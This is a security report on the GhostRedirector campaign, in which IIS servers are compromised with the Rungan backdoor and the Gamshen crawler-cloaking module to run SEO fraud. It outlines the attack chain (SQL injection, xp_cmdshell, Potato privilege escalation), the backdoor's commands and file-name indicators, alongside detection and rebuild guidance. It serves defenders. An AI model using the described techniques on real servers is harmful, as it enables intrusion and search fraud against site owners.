At least 65 internet-facing Windows servers have been quietly conscripted into an SEO fraud network, each one armed with a stealthy backdoor and a malicious IIS module that feeds manipulated content exclusively to search engine crawlers. The campaign, which ESET researchers have named GhostRedirector, was active between December 2024 and April 2025, with a follow-up scan in June 2025 confirming the infections. Victims span the globe but are heavily concentrated in Brazil, Thailand, and Vietnam, with additional servers compromised in the United States, Canada, Finland, India, the Netherlands, the Philippines, and Singapore.

What makes GhostRedirector especially insidious is its dual-purpose payload: Rungan, a native C++ backdoor that gives attackers persistent remote control, and Gamshen, a custom IIS module that performs crawler-aware cloaking. By altering HTTP responses only for bots like Googlebot, Gamshen injects backlinks and doorway pages that boost third-party gambling sites, hijacking the reputation of each compromised domain without ever disturbing the normal user experience.

ESET associates the activity with a China-aligned threat actor based on code artifacts, embedded language strings, and a code-signing certificate tied to a Shenzhen company. The attribution is probabilistic; researchers label it as "medium to high confidence" but caution that it remains a working hypothesis. For administrators, the immediate priority is detection and eradication, not geopolitical posturing.

The GhostRedirector Campaign at a Glance

The attacks all target internet-facing Windows servers running IIS. ESET's investigation points to a common initial entry point: a web application vulnerability, most frequently SQL injection. Once inside, the operators execute operating system commands—often via xp_cmdshell on compromised SQL Server instances—and stage a downloader that fetches the full toolkit.

That toolkit includes privilege escalation exploits from the Potato family (EfsPotato, BadPotato), a collection of webshells in ASP, PHP, and JavaScript, the Rungan backdoor, and the Gamshen IIS module. This layered approach guarantees redundancy; if one implant is discovered and removed, others remain to re-establish control.

So far, ESET has identified at least 65 confirmed victims, but that number almost certainly undercounts the true scale. The campaign's stealthy nature—normal visitors see nothing amiss—likely allows it to propagate undetected for extended periods. The geographic diversity suggests that no single industry or region is exclusively targeted; any vulnerable IIS host can become a node in this hidden network.

Inside the Dual Implant: Rungan and Gamshen

Rungan: The Silent Backdoor

Rungan is compiled C++ malware designed for minimal noise and maximum flexibility. It registers listener endpoints and parses commands delivered through carefully crafted URL patterns. Capabilities observed by ESET include:

  • Executing arbitrary OS commands via CreateProcessA and returning output.
  • Creating new local user accounts (the mkuser command).
  • Enumerating file system directories (listfolder).
  • Adding new backdoor callback URLs (addurl).

Because Rungan is native code, it can reside in innocuous-looking folders like ProgramData or dig into system directories, evading simple file-integrity scans. Detecting it requires memory and process inspection, not just filesystem checks. ESET noted the backdoor often masquerades as a system file named miniscreen.dll, but the name can be changed at will.

Gamshen: The Crawler Deceiver

Gamshen is a native IIS module—a DLL loaded directly into the IIS worker process, w3wp.exe. It inspects every incoming request and selectively rewrites HTTP responses when the user-agent or IP address matches search engine crawlers. This cloaking lets it:

  • Inject backlinks and redirects intended to manipulate search rankings.
  • Serve specialized doorway-page content only to bots.
  • Leave ordinary user traffic completely untouched, bypassing QA tests and manual site reviews.

By running in-process, Gamshen inherits the worker process's privileges and can manipulate traffic at will. ESET observed the module pushing links to gambling domains, suggesting the attackers are monetizing the scheme by selling ranking boosts to affiliate networks. The module's observed file names include ManagedEngine64_v2.dll and ManagedEngine32_v2.dll, though these, too, can be customized.

Initial Access: SQL Injection and Escalation

The campaign relies heavily on poorly secured web applications. A successful SQL injection provides the foothold. From there, attackers enable xp_cmdshell to execute system commands, download a small stub, and then pull down the larger implant suite.

Next comes privilege escalation. The Potato family exploits—EfsPotato, BadPotato, and related tools—allow the intruders to escalate to SYSTEM privileges, giving them full control over the server. With elevated access, they install persistent mechanisms: webshells in multiple scripts, rogue local user accounts, and signed binaries that bypass application whitelisting.

ESET's findings underscore that patching SQL injection alone isn't sufficient; the entire web stack must be hardened to break the attack chain early. Disabling xp_cmdshell and restricting the SQL Server service account's OS privileges are critical first steps.

Crawler Cloaking: How Gamshen Works

The core innovation of GhostRedirector is its crawler cloaking module. Gamshen sits in the IIS request pipeline and checks each incoming user-agent string against a list of known search engine crawlers. When a match is found, it modifies the server's response—altering HTML, injecting links, or even redirecting the request to attacker-controlled landing pages.

Because everyday users and security scanners don't normally send crawler user-agents, the deceit can persist for months. Traditional integrity checks that compare production and staging sites won't catch it unless they specifically mimic crawler behavior. This creates a dangerous blind spot: a website can appear perfectly healthy while secretly funneling authority to gambling sites and accumulating penalties from Google and Bing.

The practice runs afoul of search engine guidelines on cloaking and link schemes. A domain caught participating risks being demoted or removed from search results entirely, even if the site owner is an innocent victim.

Detection: Unmasking the Hidden Fraud

ESET's disclosure provides a clear detection playbook. The single most effective test is to compare responses:

  1. Send a request with a standard browser user-agent (e.g., Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36).
  2. Send an identical request but with a Googlebot user-agent (e.g., Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)).
  3. Compare the outputs. Any difference in content, links, or redirects is a strong indicator of Gamshen.

Other detection steps include:

  • Enumerate IIS modules: Use appcmd list modules or inspect applicationHost.config. Look for unexpected native module entries, particularly DLL names like ManagedEngine64_v2.dll or ManagedEngine32_v2.dll.
  • Hunt known filenames: Search for miniscreen.dll (Rungan), link.exe (a helper tool), and binaries under ProgramData or inetsrv directories.
  • Monitor for Potato exploits: Configure Sysmon and EDR to flag CreateProcessWithToken, CreateProcessAsUser, and named pipe creation—signals of local privilege escalation.
  • Check for rogue accounts: Review local user accounts for recent additions made by Rungan's mkuser command.
  • Inspect service registrations: Look for anomalous ServiceDLL registry values that could indicate persistence hooks.

If any of these indicators are found, treat the server as fully compromised. A quick file delete or module unload is rarely enough.

Mitigation: Eradicating a Bespoke Threat

Partial remediation is a fool's errand in GhostRedirector cases. The layered implants—Rungan in the filesystem, Gamshen in the IIS worker process, and additional webshells and accounts elsewhere—virtually guarantee a relapse. ESET strongly recommends a full rebuild from known-good images. The checklist:

  • Isolate the infected host immediately and preserve forensic artifacts: memory snapshots, event logs, applicationHost.config, and w3wp memory dumps.
  • Rebuild the server from scratch. Do not rely on in-place removal.
  • Rotate all credentials that touched the compromised system, including service accounts and database passwords. Revoke any code-signing certificates that signed suspicious binaries.
  • Harden the web application: patch and remediate SQL injection and command injection vectors; disable xp_cmdshell; restrict the SQL Server service account's OS privileges.
  • Deploy a WAF with SQL injection protection, tuned to your traffic patterns.
  • Coordinate with SEO specialists and submit search engine reconsideration requests after cleanup to undo penalties.

Remember to test as a crawler during and after cleanup to verify that cloaking is fully eliminated.

Business and SEO Fallout

While GhostRedirector doesn't directly steal data or deface pages, the business consequences can be severe. Search engines penalize cloaking and manipulative backlink schemes harshly. Once Google or Bing flags a domain for cloaking, organic traffic can plummet, devastating revenue and brand visibility. Even after remediation, trust may take months to restore.

Brand damage extends beyond search rankings. Partners and customers who discover the compromise may question security competence, even if no visible harm occurred. In regulated industries—such as healthcare (HIPAA), education (FERPA), or finance (PCI DSS)—the presence of an undetected backdoor may trigger mandatory breach notifications and legal scrutiny, multiplying costs. For organizations that process personal data under GDPR or similar frameworks, the discovery of unauthorized control over web responses could be considered a reportable incident.

Strengths of the Adversary

GhostRedirector demonstrates a mature operational model. The attackers' strengths lie in:

  • In-process persistence: Gamshen runs inside the IIS worker process, making it invisible to file scanners and most behavioral monitors.
  • Layered redundancy: Multiple persistence mechanisms—webshells, accounts, signed binaries, Potato exploits—make cleanup difficult.
  • Low-noise monetization: SEO fraud generates revenue without the high network noise of ransomware or cryptomining, allowing long dwell times.

Because the campaign flies under the radar, a single compromised IIS estate can remain a persistent, monetizable asset for years, funneling link juice to paying customers.

What Comes Next

The 65 known victims likely represent the tip of the iceberg. As long as SQL injection and similar web vulnerabilities remain common, the campaign can scale rapidly. ESET warns that copycat groups may adopt the technique, building similar crawler-cloaking IIS modules for other verticals. The underlying code is not overly complex; its power lies in the operational concept.

Future variants of Rungan could incorporate lateral movement capabilities or additional stealth features, complicating incident response further. Organizations must assume that internet-facing IIS servers are high-value targets and harden them accordingly.

Long-Term Hardening Guidance

To reduce the risk of GhostRedirector-style attacks, organizations should adopt a defense-in-depth posture:

  • Treat internet-facing IIS servers as critical assets, applying controls and monitoring similar to domain controllers or VPN concentrators.
  • Enforce least privilege for service accounts. Require multi-factor authentication and just-in-time elevation for administrative actions that can register modules or modify applicationHost.config.
  • Implement robust telemetry: deploy EDR with module-load detection, enable Sysmon with named-pipe and token event logging, and centralize web logs for crawler-aware comparison.
  • Regularly audit and inventory IIS modules and code-signing certificates. Block unsigned or unexpected native extensions where possible.
  • Include SEO integrity as part of incident response: monitor Google Search Console and backlink profiles for anomalies, and establish cross-team notifications when suspicious crawler behavior is detected.

Conclusion: Reputation as an Attack Surface

GhostRedirector redefines what it means to secure a web server. Defenders must now guard not only data and uptime but also the invisible signals flowing to search engines. A website's reputation with Google is a tangible, monetizable asset—and attackers have shown it can be quietly hijacked.

Immediate crawler-aware hunts, robust behavioral telemetry, and a commitment to full rebuilds upon compromise are the only reliable defenses. Administrators should inventory IIS modules, deploy EDR with module-load detection, and make search engine integrity part of their incident response playbook. The lesson is clear: what you don't see can rank you down, and the cost of inaction is measured not just in dollars but in lost trust and search visibility.